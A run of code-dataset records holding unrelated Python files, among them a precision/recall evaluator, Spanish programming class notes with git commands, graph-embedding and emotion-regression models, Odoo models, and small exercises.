default=3, help='K-value used for estimating the manifold to which the dataset belongs in the feature space (feature vectors closer than kth nearest neighbors of any dataset are approximated as belonging to the manifold)')\n parser.add_argument('--device', '-d', type=str, default='cuda', choices=['cuda', 'cpu'], help='Which device to use')\n parser.add_argument('--json', '-j', type=str, nargs='?', default=None, const='', help='Output json file')\n return parser.parse_args()\n\n\ndef main(opts):\n real_dir = os.path.abspath(opts.real_dir)\n real_files = glob_filepaths(real_dir, recursive=opts.recursive)\n real_manifold_dict = dict()\n classifier_set = set()\n\n estimator = ManifoldEstimator(k=opts.k, device=opts.device)\n\n print('Loading real features and estimating manifolds...')\n for f in tqdm(real_files):\n name, classifier = extract_from_filename(f)\n features = np.load(f)['features']\n real_manifold_dict[classifier] = estimator.evaluate(features)\n classifier_set.add(classifier)\n\n fake_dir = os.path.abspath(opts.fake_dir)\n fake_files = glob_filepaths(fake_dir, recursive=opts.recursive)\n fake_manifold_list_dict:Dict[List[Manifold]] = dict()\n\n fake_name_set = set()\n\n print('Loading fake features and estimating manifolds...')\n for f in tqdm(fake_files):\n name, classifier = extract_from_filename(f)\n features = np.load(f)['features']\n manifold = estimator.evaluate(features)\n if classifier in fake_manifold_list_dict:\n fake_manifold_list_dict[classifier] += [(name, manifold)]\n else:\n fake_manifold_list_dict[classifier] = [(name, manifold)]\n fake_name_set.add(name)\n\n print('Evaluating Precision and Recall...')\n results = dict()\n classifiers = tqdm(real_manifold_dict.keys())\n classifiers.set_description('Total progress')\n for classifier in classifiers:\n real_manifold = real_manifold_dict[classifier]\n if classifier not in results:\n results[classifier] = dict()\n fake_manifold_list = tqdm(fake_manifold_list_dict.get(classifier, []))\n for name, fake_manifold in fake_manifold_list:\n fake_manifold_list.set_description(f'Classifier={classifier}, Name={name}')\n results[classifier][name] = get_precision_and_recall(real_manifold, fake_manifold)\n \n save_path = os.path.abspath(opts.out_path)\n save_dir, _ = os.path.split(save_path)\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n \n print(f'Writing results to {save_path}')\n with open(save_path, mode='w', encoding='utf8', newline='') as f:\n writer = csv.writer(f, delimiter=',')\n fake_names = sorted(fake_name_set)\n writer.writerow(['']*2 + [name for name in fake_names])\n for classifier in sorted(classifier_set):\n rows = [[classifier, 'precision'], [classifier, 'recall']]\n res_cls = results.get(classifier)\n if res_cls:\n for name in fake_names:\n v:PrecisionRecall = res_cls.get(name)\n rows[0].append(v.precision)\n rows[1].append(v.recall)\n \n writer.writerows(rows)\n \n if opts.json is not None:\n json_path = os.path.splitext(save_path)[0] + '.json' if not opts.json else opts.json\n print(f'Writing results to {json_path}')\n json_data = []\n for classifier in sorted(classifier_set):\n res_cls = results.get(classifier)\n if not res_cls:\n continue\n for name in fake_names:\n value = res_cls.get(name)\n if value is None:\n continue\n json_data.append({'classifier':classifier, 'name':name, 'precision': value.precision, 'recall': value.recall})\n with open(json_path, mode='w', encoding='utf8', newline='') as f:\n json.dump(json_data, f, indent=4)\n\n\nif __name__ == '__main__':\n main(parse_args())","repo_name":"toshiaki1729/image-assessing-toolbox","sub_path":"precision_recall.py","file_name":"precision_recall.py","file_ext":"py","file_size_in_byte":4829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72745803667","text":"from math import sqrt\n\n\nprint(\"Clase 1\")\n\n'''\n Comentarios\n Los nombres de variables deben iniciar en minúscula, los de las clases en mayúscula.\n'''\n\n#Comentarios de GIT\n'''\n GIT INIT ---> Inicializa la Rama\n GIT ADD ---> Agrega los nuevos cambios\n GIT STATUS ---> Muestra el estatus de los commits\n GIT COMMIT ---> Toma la foto\n Regla de clase al darle mensaje al Commit ---> NTV1 (El número varía por la clase)\n GIT LOG ---> Muestra los commits.\n GIT REMOTE ADD origin https://github.com/usuario/repositorio.git ---> Añadir repositorio en remoto.\n GIT PUSH -U ORIGIN MASTER ---> La primera vez que vinculamos el repositorio remoto con el local.\n GIT PULL ---> Para descargar los cambios del repositorio remoto al local.\n GIT CLONE (URL) ---> Clonar repositorio al local.\n GIT COMMIT --AMEND -M \"\" ---> Renombrando commit\n GIT CONFIG --GLOBAL --UNSET CREDENTIAL.HELPER \n GIT CONFIG --UNSET CREDENTIAL.HELPER \n'''\n\nprint(\"Clase 2 NTV\")\n\n'''\n Convensiones ---> Estructurar adecuadamente los archivos.\n .gitignore ---> Archivo de configuración. Especificar las carpertas o archivos que no voy a versionar.\n'''\n\n#Entradas del problema.\n#En python siempre se le debe dar valor a una variable;\n#Para dejarla sin un valor agregamos la palabra none.\n'''\nnumero1 = None\nnumero2 = int(input(\"Digite el número 2: \"))\nnumero3 = int(input(\"Digite el número 3: \"))\n#numero3 = 80\nprint(f'El número 2 es {numero2}')\nprint(f'El número 3 es {numero3}')\nsuma = numero2 + numero3\nprint(f'La suma es {suma}')\n'''\n'''\nciudad = \"Medellín\"\nprint(f'Tu ciudad es {ciudad}')\nprint(numero1)\nprint(numero2)\nprint(numero3)\nprint(numero3 == numero1)\nnombre = input(\"Ingresa nombre: \")\nprint(f'Su nombre es {nombre}')\n'''\n\n#Retos\nprint(\"Clase 3 NTV\")\n\nprint(\"Retos\")\n\nnumero = 1\nsuma = 0\nwhile(numero >= 0):\n numero = int(input(\"Digite un número entero positivo; uno negativo para salir: \"))\n print(f'El número es {numero}')\n suma = suma + numero\n print(f'La suma es {suma}')\n\nprint(\"Has salido.\")\n\n\n#Menú\n\nnumero = 1\n\nwhile (numero != 0):\n print(\" 0 ---> Salida \\n 1 ---> Encuentre si el número es múltiplo de 2 \\n 2 ---> Encuentre la raiz cuadrada del número \\n 3 ---> Sume 100 al número ingresado \\n 4 ---> Eleve a la 2 el número ingresado.\")\n\n numero = int (input(\"Qué opción elegirás: \"))\n if(numero == 1):\n numeroMultiploDos = int(input(\"Ingrese el número a averiguar si es múltiplo de 2: \"))\n residuo = numeroMultiploDos % 2\n if(residuo == 0):\n print(\"Es múltiplo de 2.\")\n else:\n print(\"No es múltiplo de 2.\")\n\n if(numero == 2):\n numeroRaizCuadrada = int(input(\"Ingrese el número para saber su raiz cuadrada: \"))\n raizCuadrada = sqrt(numeroRaizCuadrada)\n print(f'La raiz cuadrada de {numeroRaizCuadrada} es {raizCuadrada}')\n\n if(numero == 3):\n numeroSumar = int(input(\"Ingrese el número al que desea sumarle 100: \"))\n numeroSumar = numeroSumar + 100\n print(f'El resultado es {numeroSumar}.')\n\n if(numero == 4):\n numeroElevar = int(input(\"Ingrese el número a elevar: \"))\n elevar = numeroElevar * 2\n print(f'El número a elevar que ingresaste fue {numeroElevar} y el resultado es {elevar}')\n\n\n#Suma de 12 en 12\n\nfor i in range(0, 200, 12):\n print(i, end=\", \")\n\nprint(\"\\n\")\n#Pedir 20 números y contar cuántos fueron negativos y positivos.\nnumeroEntero = None\ncentinela = 0\ncontadorPositivos = 0\ncontadorNegativos = 0\n\nwhile(centinela < 20):\n numero = int(input(\"Ingrese un número: \"))\n if(numero > 0):\n contadorPositivos += 1\n else:\n contadorNegativos += 1\n \n centinela+=1\n\nprint(f'Números negativos ingresados {contadorNegativos}. Números positivos ingresados {contadorPositivos}')\n\n'''Clase 4'''\n\n'''\n# crear rama\ngit branch nombre-rama\n\n# cambiar de rama\ngit checkout nombre-rama\n\n# crear una rama y cambiarte a ella\ngit checkout -b rama\n\n# eliminar rama\ngit branch -d nombre-rama\n\n#eliminar rama (forzado)\ngit branch -D nombre-rama\n\n# listar todas las ramas del repositorio\ngit branch\n\n# lista ramas no fusionadas a la rama actual\ngit branch --no-merged\n\n# lista ramas fusionadas a la rama actual\ngit branch --merged\n\n# rebasar ramas\ngit checkout rama-secundaria\ngit rebase rama-principal\n\n# nos cambiamos a la rama principal que quedará de la fusión\ngit checkout rama-principal\n\n# ejecutamos el comando merge con la rama secundaria a fusionar\ngit merge rama-secundaria\n\ngit push origin --delete rama\n'''\n\n#Git\n'''\nGit reset --soft (ID del Commit) \n'''","repo_name":"CamiloXXI/NTV","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4597,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43518167432","text":"# 팰린드롬은 어느 방향으로 읽어도 항상 같은 방법으로 읽을 수 있는 단어이다. 예를 들어, civic, radar, rotor, madam은 팰린드롬이다.\r\n#\r\n# 상근이는 단어 k개 적혀있는 공책을 발견했다. 공책의 단어는 ICPC 문제가 저장되어 있는 서버에 접속할 수 있는 비밀번호에 대한 힌트이다. 비밀번호는 k개의 단어 중에서 두 단어를 합쳐야 되고, 팰린드롬이어야 한다. 예를 들어, 단어가 aaba, ba, ababa, bbaa, baaba일 때, ababa와 ba를 합치면 팰린드롬 abababa를 찾을 수 있다.\r\n#\r\n# 단어 k개 주어졌을 때, 팰린드롬을 찾는 프로그램을 작성하시오.\r\n\r\nfrom itertools import combinations\r\ndef palindrome(word):\r\n if word == word[::-1]:\r\n return True\r\n else:\r\n return False\r\n\r\nT = int(input())\r\nfor _ in range(T):\r\n k = int(input())\r\n palindrome_li = []\r\n li = []\r\n for _ in range(k):\r\n string = input()\r\n li.append(string)\r\n combine_list = combinations(li, 2)\r\n for a, b in combine_list:\r\n combine_string1 = a + b\r\n combine_string2 = b + a\r\n if palindrome(combine_string1):\r\n palindrome_li.append(combine_string1)\r\n if palindrome(combine_string2):\r\n palindrome_li.append(combine_string2)\r\n if palindrome_li == []:\r\n print(0)\r\n else:\r\n print(palindrome_li[0])","repo_name":"dnwls16071/PS_Baekjoon","sub_path":"8000~8999/8892.py","file_name":"8892.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35393245762","text":"import math\n\nx_frac = 0\nfrac_list = []\nx_list = []\ny_list = []\nlow = 2\nhi = 10\nN = 10\narea = 0\nx = low\n\ndef f(x):\n return 2*x\n\nfor i in range(N):\n x += (1/N)*(hi-low)\n x_list.append(x)\n\nprint(x_list)\n\nfor x in x_list:\n y_list.append(f(x))\n\nx_diff = x_list[1] - x_list[0]\n\nfor y in y_list:\n area += x_diff*y\n\nprint(area)\n\n\n\n\ndef dbl(x):\n \"\"\" input: a number x (int or float)\n output: twice the input\n \"\"\"\n return 2*x\n\ndef unitfracs(N):\n frac = 0\n frac_list = []\n for i in range(0,N):\n frac_list.append(frac)\n frac += 1/N\n\n return frac_list\n\n#print(unitfracs(4))\n\ndef scaledfracs(low,hi,N):\n scaled_list = []\n frac_list = unitfracs(N)\n for frac in frac_list:\n scaled_list.append(low+frac*(hi-low))\n return scaled_list\n\n#print(scaledfracs(10, 30, 5 ))\n\ndef sqfracs(low,hi,N):\n sqfracs_list = []\n scaled_list = scaledfracs(low,hi,N)\n for frac in scaled_list:\n sqfracs_list.append(frac**2)\n\n return sqfracs_list\n\n#print(sqfracs(4,10,6))\n\ndef f_of_fracs(f,low,hi,N):\n y_list = []\n scaled_list = scaledfracs(low,hi,N)\n for frac in scaled_list:\n y_list.append(f(frac))\n\n return y_list\n\n#print(f_of_fracs(math.sin, 0, math.pi, 4))\n\ndef integrate(f,low,hi,N):\n total = 0\n y_list = f_of_fracs(f,low,hi,N)\n x_list = scaledfracs(low,hi,N)\n x_diff = x_list[1]-x_list[0]\n for i in range(len(y_list)):\n total += y_list[i]*x_diff\n\n return total\n\n#print(integrate(math.sin, 0, math.pi, 1000))\n","repo_name":"beccaelenzil-teach/CS-Becca-1718","sub_path":"fundamentals_of_cs/p3_integrate.py","file_name":"p3_integrate.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6673460702","text":"import matplotlib.pyplot as plt\nimport platform\n\nfrom datetime import datetime\n\n# matplotlib 패키지 한글 깨짐 처리 시작\nif platform.system() == 'Darwin': # mac os\n plt.rc('font', family='AppleGothic')\nelif platform.system() == 'Windows': # 윈도우\n plt.rc('font', family='Malgun Gothic')\nelif platform.system() == 'Linux': # 리눅스 (구글 콜랩)\n #!wget \"https://www.wfonts.com/download/data/2016/06/13/malgun-gothic/malgun.ttf\"\n #!mv malgun.ttf /usr/share/fonts/truetype/\n #import matplotlib.font_manager as fm\n #fm._rebuild()\n plt.rc('font', family='Malgun Gothic')\n\nplt.rcParams['axes.unicode_minus'] = False # 한글 폰트 사용시 마이너스 폰트 깨짐 해결\n# matplotlib 패키지 한글 깨짐 처리 끝\n\n# 통계 시작\ndef statistics_pie_char(time: datetime.today(), user_name: str):\n # pie chart를 사용할 때, 원의 형태를 유지하기 위한 명령어\n plt.axis('equal')\n\n # 추후에 text 감정분석 파트가 개발 완료가 되면 검출된 감정들을 list로 받고 (중요: 중복 허용해야함)\n # sizes는 각 감정의 개수만큼으로 비율화\n # 위 두 사항을 적용해서 static이 아닌 변화형 pie chart 출력하도록 수정\n labels = ['우울', '두려움', '행복', '중립']\n sizes = [15, 30, 45, 10]\n colors = ['yellowgreen', 'gold', 'lightskyblue', 'lightcoral']\n explode = (0, 0.1, 0, 0)\n plt.title(f\"{time} {user_name} 심리분석 결과\")\n plt.pie(sizes, explode=explode, labels=labels, colors=colors,\n autopct='%1.1f%%', shadow=True, startangle=90)\n plt.axis('equal')\n\n # 그래프 출력\n # plt.show()\n # 그래프 저장\n plt.savefig(f'/Users/sharekim_hangyuseong/Desktop/{time} {user_name}.jpg')\n\n\nif __name__ == '__main__':\n time = datetime.today().strftime(\"%Y-%m-%d\")\n\n statistics_pie_char(time, user_name='user_name')","repo_name":"KYUSEONGHAN/Drawing-Dirary","sub_path":"statistics/daily_text.py","file_name":"daily_text.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10154915333","text":"# -*- coding: utf-8 -*-\n# © <2016> \n# © <2019> \n# © <2019> \n# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).\n\nfrom odoo import api, fields, models\n\n\nclass CountryCity(models.Model):\n _name = 'res.country.city'\n _description = \"City model\"\n\n country_id = fields.Many2one(\n 'res.country',\n 'Country',\n required=True\n )\n state_id = fields.Many2one(\n 'res.country.state',\n 'State',\n domain=\"[('country_id','=',country_id)]\",\n required=True\n )\n name = fields.Char('Name', size=64, required=True)\n code = fields.Char('Code', size=4, required=True)\n\n\nclass CountryZone(models.Model):\n _name = 'res.country.zone'\n _description = \"Zone model\"\n\n country_id = fields.Many2one(\n 'res.country',\n 'Country',\n required=True\n )\n state_id = fields.Many2one(\n 'res.country.state',\n 'State',\n domain=\"[('country_id','=',country_id)]\",\n required=True\n )\n city_id = fields.Many2one(\n 'res.country.city',\n 'Canton',\n domain=\"[('state_id','=',state_id)]\",\n required=True\n )\n name = fields.Char('Name', size=64, required=True)\n code = fields.Char('Code', size=6, required=True)","repo_name":"gromanec/odoo-ecuador","sub_path":"l10n_ec_ote/models/country.py","file_name":"country.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"28192255723","text":"import pandas as pd\nimport tensorflow as tf\nimport numpy as np\nimport random\nimport time\nimport copy\nfrom res_bol_mac import res_bol_mac\n\n\n\nclass SDNE:\n def __init__(self,args,path):\n self.suffix = path.split('.')[-1]\n self.is_variables_init = False\n self.args = args\n self.path = path\n config = tf.ConfigProto()\n self.sess = tf.Session(config=config)\n \n \n self.layers = len(args['struct'])\n self.struct = args['struct']\n self.sparse_dot = False\n self.W = {}\n self.b = {}\n struct = self.struct\n for i in range(self.layers - 1):\n name = \"encoder\" + str(i)\n self.W[name] = tf.Variable(tf.random.normal([struct[i], struct[i+1]]), name = name)\n self.b[name] = tf.Variable(tf.zeros([struct[i+1]]), name = name)\n struct.reverse()\n for i in range(self.layers - 1):\n name = \"decoder\" + str(i)\n self.W[name] = tf.Variable(tf.random.normal([struct[i], struct[i+1]]), name = name)\n self.b[name] = tf.Variable(tf.zeros([struct[i+1]]), name = name)\n self.struct.reverse()\n\n \n self.Adjacency_matrix = tf.placeholder(\"float\", [None,None])\n self.struct = struct\n tf.compat.v1.global_variables_initializer()\n self.X = tf.placeholder(\"float\",[None,struct[0]])\n self.X2 = tf.placeholder(\"float\",[None,struct[0]])\n tf.compat.v1.global_variables_initializer()\n\n self.Encode_Decode_process()\n self.loss = self.__make_loss(args)\n self.optimizer = tf.compat.v1.train.RMSPropOptimizer(args['learning_rate']).minimize(self.loss)\n self.optimizer1 = tf.compat.v1.train.AdamOptimizer(args['learning_rate']).minimize(self.loss)\n\n def Encode_Decode_process(self):\n def Encoder(X):\n for i in range(self.layers-1):\n name = \"encoder\" + str(i)\n X = tf.nn.sigmoid(tf.matmul(X,self.W[name])+self.b[name])\n return X\n def Decoder(X):\n for i in range(self.layers-1):\n name = \"decoder\"+ str(i)\n X = tf.nn.sigmoid(tf.matmul(X,self.W[name])+self.b[name])\n return X\n\n\n \n \n\n self.H = Encoder(self.X)\n self.X_reconstruct = Decoder(self.H)\n\n\n def __make_loss(self,args):\n def get1loss(Enc,adj_matrix):\n D = tf.linalg.tensor_diag(tf.reduce_sum(adj_matrix,1))\n L = D - adj_matrix\n return 2*tf.trace(tf.matmul(tf.matmul(tf.transpose(Enc),L),Enc)) \n def get2loss(X,Dec,beta):\n B = X * (beta-1) + 1\n return tf.reduce_sum(tf.pow((Dec - X)* B, 2))\n def get_reg_loss(w,b):\n ret = tf.add_n([tf.nn.l2_loss(wi) for wi in w.values()])\n ret = ret + tf.add_n([tf.nn.l2_loss(bi) for bi in b.values()])\n return ret\n\n\n self.loss_1 = get1loss(self.H,self.Adjacency_matrix)\n self.loss_2 = get2loss(self.X,self.X_reconstruct,self.args['beta'])\n self.loss_reg = get_reg_loss(self.W,self.b)\n return args['gamma']*self.loss_1 + args['alpha']*self.loss_2 + args['reg']*self.loss_reg\n\n \n def do_variables_init(self,data):\n def assign(a,b):\n op = a.assign(b)\n self.sess.run(op)\n init = tf.compat.v1.global_variables_initializer()\n print(\"ABBBB\")\n print(data)\n self.sess.run(init)\n if self.args['dbn_init']:\n shape = self.struct\n myRBMs = []\n for i in range(len(shape)-1):\n myRBM = res_bol_mac([shape[i],shape[i+1]],{\"batch_size\":self.args['dbn_batch_size'],\"learning_rate\":self.args['dbn_learning_rate']},self)\n myRBMs.append(myRBM)\n for epoch in range(self.args['dbn_epochs']):\n error = 0\n for batch in range(0,self.struct[0],self.args['dbn_batch_size']):\n mini_batch = data.sample(self.args['dbn_batch_size']).X\n for k in range(len(myRBMs)-1):\n mini_batch = myRBMs[k].getH(mini_batch)\n error += myRBM.fit(mini_batch)\n print(\"rbm epochs:\",epoch,\"error:\",error)\n W,bv,bh = myRBM.getWb()\n name = \"encoder\" + str(i)\n assign(self.W[name],W)\n assign(self.b[name],bh)\n name =\"decoder\" + str(self.layers - i -2)\n assign(self.W[name],W.transpose())\n assign(self.b[name],bv)\n self.is_Init = True\n \n def save_model(self,path):\n saver = tf.train.Saver(list(self.b.values()) + list(self.W.values()))\n saver.save(self.sess,path)\n\n def get_feed_dict(self,data):\n X = data.X\n return {self.X:data.X,self.Adjacency_matrix:data.adjacency_matriX}\n def __get_feed_dict(self,Encoded,adj):\n return {self.H:Encoded,self.Adjacency_matrix:adj}\n \n def get_loss(self, data):\n feed_dict = self.get_feed_dict(data)\n return self.sess.run(self.loss, feed_dict = feed_dict)\n \n\n def get_embedding(self,data):\n print(self.H,self.X)\n return self.sess.run(self.H,feed_dict= self.get_feed_dict(data))\n def fit(self,data):\n feed_dict = self.get_feed_dict(data)\n ret,_ = self.sess.run((self.loss,self.optimizer),feed_dict=feed_dict)\n return ret\n ","repo_name":"vikas784/GraphNetworks","sub_path":"SDNE.py","file_name":"SDNE.py","file_ext":"py","file_size_in_byte":4873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12477127694","text":"from tensorflow.keras.models import load_model\nimport cv2\nimport os\nimport numpy as np\nimport pandas as pd \nimport glob2\nfrom tqdm import tqdm\n\nMODEL_SURPRISE = load_model('EfficientNetB4_image_regression_surprise.h5')\nMODEL_SAD = load_model('EfficientNetB4_image_regression_sad.h5')\nMODEL_OTHER = load_model('EfficientNetB4_image_regression_other.h5')\nMODEL_NEUTRAL = load_model('EfficientNetB4_image_regression_neutral.h5')\nMODEL_HAPPY = load_model('EfficientNetB4_image_regression_happy.h5')\nMODEL_FEAR = load_model('EfficientNetB4_image_regression_fear.h5')\nMODEL_DISGUST = load_model('EfficientNetB4_image_regression_disgust.h5')\nMODEL_ANGRY = load_model('EfficientNetB4_image_regression_angry.h5')\n\ndef get_output_image_regression(image_id, image, input_size=380):\n image = cv2.resize(image, (input_size, input_size))\n image = image / 255.0\n image = image.reshape((1,input_size,input_size,3))\n\n prob_surprise = MODEL_SURPRISE.predict(image)[0][0] \n prob_sad = MODEL_SAD.predict(image)[0][0] \n prob_other = MODEL_OTHER.predict(image)[0][0]\n prob_neutral = MODEL_NEUTRAL.predict(image)[0][0] \n prob_happy = MODEL_HAPPY.predict(image)[0][0]\n prob_fear = MODEL_FEAR.predict(image)[0][0] \n prob_disgust = MODEL_DISGUST.predict(image)[0][0] \n prob_angry = MODEL_ANGRY.predict(image)[0][0]\n\n result_dict = {\n 'image_id': image_id,\n 'angry': prob_angry,\n 'disgust': prob_disgust,\n 'fear': prob_fear,\n 'happy': prob_happy,\n 'sad': prob_sad,\n 'surprise': prob_surprise,\n 'neutral': prob_neutral,\n 'other': prob_other\n }\n\n result_list = [image_id, prob_angry, prob_disgust, prob_fear, prob_happy, prob_sad, prob_surprise, prob_neutral, prob_other]\n\n return result_dict, result_list\n\ndef get_submit_image_regression(folder_dir):\n list_image_name = glob2.glob(os.path.join(folder_dir, '*.jpg'))\n len_list_image_name = len(list_image_name)\n list_output = []\n with tqdm(total=len_list_image_name) as pbar:\n for image_path in list_image_name:\n image = cv2.imread(image_path)\n image_id = (image_path.split(\"/\")[-1]).split(\".\")[0]\n\n # get result\n result_dict, result_list = get_output_image_regression(image_id, image)\n list_output.append(result_list)\n pbar.update(1)\n \n df_output = pd.DataFrame(list_output)\n df_output.to_csv(\"output.csv\")\n print(\"########## DONE #############\")\n\nif __name__ == '__main__':\n get_submit_image_regression('test')","repo_name":"hieu28022000/Comic_emotions","sub_path":"src/Emotion_Regression/predict_regression.py","file_name":"predict_regression.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24148749947","text":"from setuptools import setup\n\nAPP = ['game/Perlin.py']\nDATA_FILES = [('', ['game', 'game/resources'])]\nOPTIONS = {'iconfile':'game/resources/icon/icon.png',}\n\nsetup(\n app=APP,\n data_files=DATA_FILES,\n options={'py2app': OPTIONS},\n setup_requires=['py2app'],\n)\n","repo_name":"JordanFist/perlin","sub_path":"pythonToApp/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12210715412","text":"from pathlib import Path\nfrom pprint import pprint\nimport json\nfrom ase.io import read, write\nfrom ase.geometry import crystal_structure_from_cell\nimport numpy as np\n# import numpy.linalg as la\n\nimport matplotlib.pyplot as plt\nfrom scipy.interpolate import interp1d\n\n\nclass Calculation(object):\n def __init__(self, *args, **kwargs):\n self.filepath = kwargs.pop('filepath', None)\n self.parameters = kwargs\n\n def get_data(self, index=-1):\n return read(str(self.filepath))\n\n @classmethod\n def from_path(cls, path: Path):\n with (path / 'gb.json').open() as data_file:\n gb_data = json.load(data_file)\n\n with (path / 'subgb.json').open() as data_file:\n subgb_data = json.load(data_file)\n\n # print(gb_data['angle'])\n\n filename = subgb_data['name'] + \"_traj.xyz\"\n filepath = (path / filename).resolve()\n # configuration = read(str((path / filename).resolve()), index=index)\n # # gb = read(str((path / filename).resolve()), index=-1)\n\n\n # print('{:=^60}'.format(' '+str(path)+' '))\n #\n # print('{:-^40}'.format(' gb.json '))\n # pprint(gb_data)\n #\n # print('{:-^40}'.format(' subgb.json '))\n # pprint(subgb_data)\n\n # print('{:-^40}'.format(' initial '))\n #\n # force_norm = np.linalg.norm(gb_initial.arrays['force'], axis=1)\n # force_mean = np.mean(force_norm)\n # force_std = np.std(force_norm)\n #\n # print('Force mean: {:f}, std: {:f}'.format(force_mean, force_std))\n # pprint(gb_initial.calc.results)\n #\n # print('{:-^40}'.format(' final '))\n #\n # force_norm = np.linalg.norm(gb_final.arrays['force'], axis=1)\n # force_mean = np.mean(force_norm)\n # force_std = np.std(force_norm)\n #\n # print('Force mean: {:f}, std: {:f}'.format(force_mean, force_std))\n # pprint(gb_final.calc.results)\n\n\n return cls(**{**gb_data, **subgb_data}, filepath=filepath)\n\n\nif __name__ == '__main__':\n\n # Read grain boundary database\n dirpath = Path('../GB_alphaFe_001')\n\n calculations = {\n 'tilt': [Calculation.from_path(calc_dir) for calc_dir in (dirpath / 'tilt').iterdir() if calc_dir.is_dir()],\n 'twist': [Calculation.from_path(calc_dir) for calc_dir in (dirpath / 'twist').iterdir() if calc_dir.is_dir()]\n }\n\n # potential energy of the perfect crystal according to a specific potential\n potential_energy_per_atom = -4.01298214176 # alpha-Fe PotBH\n eV = 1.6021766208e-19\n Angstrom = 1.e-10\n\n angles, energies = [], []\n for calc in sorted(calculations['tilt'], key=lambda item: item.parameters['angle']):\n\n # E_gb = calc.parameters.get('E_gb', None)\n #\n # if E_gb is None:\n # print(calc.filepath)\n # print(calc.parameters['converged'])\n # else:\n\n # energy = 16.02 / (2 * calc.parameters['A'] ) * \\\n # (E_gb - potential_energy_per_atom * calc.parameters['n_at'])\n\n if calc.parameters.get('converged', None):\n # energy = 16.02 / (2 * calc.parameters['A'] ) * \\\n # (calc.parameters.get('E_gb') - potential_energy_per_atom * calc.parameters['n_at'])\n #\n atoms = calc.get_data()\n cell = atoms.get_cell()\n A = cell[0, 0] * cell[1, 1]\n\n energy = (\n eV / Angstrom**2 /\n (2 * A) *\n (atoms.get_potential_energy() - potential_energy_per_atom * len(atoms))\n )\n\n write(calc.filepath.name, atoms)\n\n\n # print(energy)\n # print(calc.parameters['converged'])\n # print(data.get_potential_energy()) # data.get_total_energy() == data.get_potential_energy()\n # energies.append(calc.parameters['E_gb'] - data.get_total_energy())\n energies.append(energy)\n angles.append(calc.parameters['angle'] * 180.0 / np.pi)\n else:\n print(\"not converged: \", calc.filepath)\n\n\n plt.bar(angles, energies)\n\n # x_smooth = np.linspace(min(angles), max(angles), 1000, endpoint=True)\n # f = interp1d(angles, energies, kind='cubic')\n # plt.plot(x_smooth, f(x_smooth), '-')\n\n plt.show()\n\n\n","repo_name":"kcl-tscm/quip-tutorial-2018-notebooks","sub_path":"scripts/Preprocess.py","file_name":"Preprocess.py","file_ext":"py","file_size_in_byte":4264,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"25741864782","text":"# given two variables swap their values by\n# not using a third variable (mathematical solution)\n# using a third variable (swap)\n# using a built in function (swap)\n\ndef maths(a, b):\n a = a+b\n b = a-b\n a = a-b\n return a, b\n\n\ndef swap(a, b):\n temp = a\n a = b\n b = temp\n return a, b\n\n\ndef built_in(a, b):\n a, b = b, a\n return a, b\n\n\na = int(input(\"Enter a number: \"))\nb = int(input(\"Enter another number: \"))\nprint(\"Numbers are : \", a, b)\nprint(\"Swapping using method one\")\nprint(\"Numbers are - \", maths(a, b))\nprint(\"Swapping using method two\")\nprint(\"Numbers are - \", swap(a, b))\nprint(\"Swapping using method three\")\nprint(\"Numbers are - \", built_in(a, b))\n","repo_name":"sammybarman/100-Days-of-Python","sub_path":"Day1/1-4.py","file_name":"1-4.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7271552674","text":"#!/usr/bin/python3\t\n\n\nimport asyncio\n\nasync def handle_echo(reader, writer): \n\n\tcouchdb_reader, couchdb_writer = await asyncio.open_connection(\n\t\t'127.0.0.1', \n\t\t5984 \n\t) \n\tcouchdb_writer.write( \n\t\t( \n\t\t\tf\"HEAD {url.path or '/'} HTTP/1.0\\r\\n\"\n\t\t\tf\"Host: {url.hostname}\\r\\n\"\n\t\t\tf\"\\r\\n\" \n\t\t)\n\t)\n\n\tprint(f'Send: {message!r}')\n\twriter.write(message.encode())\n\n\tdata = await reader.read(100)\n\tprint(f'Received: {data.decode()!r}')\n\n\tprint('Close the connection')\n\twriter.close()\n\n\n\n\tdata = await reader.read(100)\n\tmessage = data.decode()\n\taddr = writer.get_extra_info('peername')\n\n\tprint(f\"Received {message!r} from {addr!r}\")\n\n\tprint(f\"Send: {message!r}\")\n\twriter.write(data)\n\tawait writer.drain()\n\n\tprint(\"Close the connection\")\n\twriter.close()\n\n\n\n\nasync def main():\n\tserver = await asyncio.start_server(\n\t\thandle_echo, \n\t\t'127.0.0.1', \n\t\t8888 \n\t)\n\n\tprint(f'Serving on {server.sockets[0].getsockname()}')\n\n\tasync with server:\n\t\tawait server.serve_forever()\n\n\n\nasyncio.run(main())\n\n\n\n\n","repo_name":"JGarderon/nsl","sub_path":"tester-enregappel.py","file_name":"tester-enregappel.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29734397612","text":"import unittest\nfrom graph import Graph\nfrom node import Node\n\nclass TestGraph(unittest.TestCase):\n\n def test_empty(self):\n self.g = Graph()\n self.assertEqual(self.g._number_of_nodes(), 0)\n\n def test_add(self):\n self.g = Graph()\n n 